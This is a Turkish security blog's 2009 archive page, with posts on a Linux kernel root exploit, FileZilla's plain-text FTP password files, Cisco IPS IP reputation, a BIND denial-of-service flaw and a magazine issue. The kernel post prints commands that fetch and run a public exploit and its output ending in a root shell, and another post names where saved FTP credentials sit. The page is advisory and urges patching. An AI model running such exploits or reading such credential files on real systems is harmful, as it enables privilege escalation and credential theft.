~ Ali Kapucu | Network & System & Security Research Worker ~ » 2009

Archive for Ağustos, 2009

Linux Kernel Yamalama Zamanı ve Root Olun..

Posted on Ağustos 18, 2009, under General.

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ’sock_sendpage()’ NULL Pointer Dereference Vulnerability). Özellikle sunucularında shell hesapları veren sistem adminlerinin bu açığı gidermeleri en acilinden gerekmekte..

http://www.securityfocus.com/bid/36038/info da data detaylı bilgi bulabilirsiniz!!!

Huzeyfe Onal ın yaptığı test
Exploit kullanmadan onceki kullanici haklari. $ id uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)


Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz huzeyfe@guvenlis:/tmp$ cd exploitx huzeyfe@guvenlis:/tmp/exploitx$ ls exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh [+] Personality set to: PER_SVR4 E: x11wrap.c: XOpenDisplay() failed E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed. [+] MAPPED ZERO PAGE! [+] Resolved selinux_enforcing to 0xc05b4b7c [+] Resolved selinux_enabled to 0xc05b4b78 [+] Resolved apparmor_enabled to 0xc04798a4 [+] Resolved apparmor_complain to 0xc05b6770 [+] Resolved apparmor_audit to 0xc05b6778 [+] Resolved apparmor_logsyscall to 0xc05b677c [+] Resolved security_ops to 0xc05b3324 [+] Resolved default_security_ops to 0xc0478640 [+] Resolved sel_read_enforce to 0xc021fa60 [+] Resolved audit_enabled to 0xc0574544 [+] got ring0! [+] detected 2.6 style 8k stacks [+] Disabled security of : LSM [+] Got root! # # id uid=0(root) gid=0(root) groups=1001(huzeyfe)

FileZilla Ftp şifrelerimizin turşusunu kuruyor!!!

Posted on Ağustos 14, 2009, under System Security.

Merhaba Arkadaşlar bugün Friendfeed’de Ahmet Alp Balkan’ın blogunun zararlı site olmasının muhabbeti dönerken C:\Documents and Settings\XXX\Application Data\FileZilla\sitemanager.xml veya filezilla.xml dosyalarınızı bakmanızı öneririm :S ftp şifrelerimiz ne kadar açıkta görmüş oluyoruz malesef..

Cisco IPS'lerine IP reputation özelliğini ekledi

Posted on Ağustos 12, 2009, under Network Security.

Merhabalar malum uzun süredir yazamıyorum Türkiye’deki son 1 haftama girmiş bulunmaktayım bu süre zarfında da fazla yazamayacam ancak, olaylara Fransız kalmamak için rss ve friendfeed üzerinden kendimi sürekli yeniliyorum. En geç 2 hafta içinde I’m Back diyeceğim

Başlık ile ilgili kısma gelincede başlıkta da görülebiliceği gibi Cisco IPS’lerine IP reputation özelliğini eklemiş. Peki Nedir bu IP Reputation?? Ip Reputation zararlı iş yapan iplerin tutulduğu büyük bir veritabanları listesi diyelim.. Hani Türk Telekom’un ip adresleri sürekli Spam listelerinde bundan dolayı ip ler Blacklistlere girip Bilgi İşlemcilerin Başını ağrıyor ya o listelerden işte Ip Reputation listelerini kontrol eden spam gatewayler gelen maillerde o ipler varsa işleme almadan direk engelliyor. Bunu Cisco Ipslerin yaptığını düşünürsek DDos yada başka tür bir saldırı yapan ipleri bu databaselerden alacak IPS doğası gereği gelen saldırıyı incelemeden direk Drop yapıcak buda büyük fayda..
Görüşmek Üzere

Cisco IPS’lerine IP reputation özelliğini ekledi

Posted on Ağustos 12, 2009, under Network Security.

BIND Dinamik Güncelleme Hizmet Dışı Bırakma Açıklığı Üzerine

Posted on Ağustos 11, 2009, under System Security.

BIND yazılımının geliştiricisi olan Internet Systems Consortium, 28 Temmuz 2009 tarihinde BIND çalıştıran alan adı sunucularını etkileyebilecek bir açıklığı bildirmiş, bu açıklık CVE-2009-0696 kodlu açıklık duyurusuyla geniş kitlelere ulaştırılmıştır. Bu yazıda, açıklığın doğası, gerçekleştirme şekli ve alınabilecek önlemlere değinilecektir.

Dinamik güncelleme mekanizması, alan adı sunucularının kaydını tuttukları alanların uzaktan güncellenmeleri için kullanılan bir mekanizmadır. Yetkili istemciler, bu mekanizma sayesinde sunucudaki alan bilgilerini güncelleyebilirler. Açıklık, bu mekanizmayı kullanmakta, özel düzenlenmiş bir dinamik güncelleme istek paketinin sunucuya yollanması sonucunda sunucu sürecinin sonlanmasına yol açmaktadır.

Bu açıklıkta kullanılan özel düzenlenmiş paketin, açıklığı gerçekleştirebilmesi için iki özelliğe ihtiyacı vardır. Birincisi, oluşturulan isteğin alan adı sunucusunun yetkili (authoritative) olduğu bir alanın güncellenmesine yönelik olması; ikincisi, güncellemedeki kayıt tipinin ANY olması gerekmektedir. İlk özellik aynı zamanda sunucunun alan adı için birincil alan sunucusu olmasını gerektirdiğinden, ikincil alan adı sunucuları görünüşe göre etkilenmemektedir.
(daha fazla…)

InSecure Yeni Sayı

Posted on Ağustos 10, 2009, under Bilişim.

Online ücretsiz bilişim güvenliği dergisi (IN)SECURE‘un 20. sayısı çıktı.

Yeni sayıya buradan ulaşabilirsiniz.

Konu başlıkları şu şekilde:

Improving network discovery mechanisms
Building a bootable BackTrack 4 thumb drive with persistent changes and Nessus
Review: SanDisk Cruzer Enterprise
Forgotten document of American history offers a model for President Obama’s vision of government information technology
Security standpoint by Sandro Gauci: The year that Internet security failed
What you need to know about tokenization
Q&A: Vincenzo Iozzo on Mac OS X security
Book review – Hacking VoIP: Protocols, Attacks and Countermeasures
A framework for quantitative privacy measurement
Why fail? Secure your virtual assets
Q&A: Scott Henderson on the Chinese underground
iPhone security software review: Data Guardian
Phased deployment of Network Access Control
Playing with authenticode and MD5 collisions
Web 2.0 case studies: challenges, approaches and vulnerabilities
Q&A: Jason King, CEO of Lavasoft
Book review – Making Things Happen: Mastering Project Management
ISP level malware filtering
The impact of the consumerization of IT on IT security management

Korumalı: İşte Burada

Posted on Ağustos 5, 2009, under General.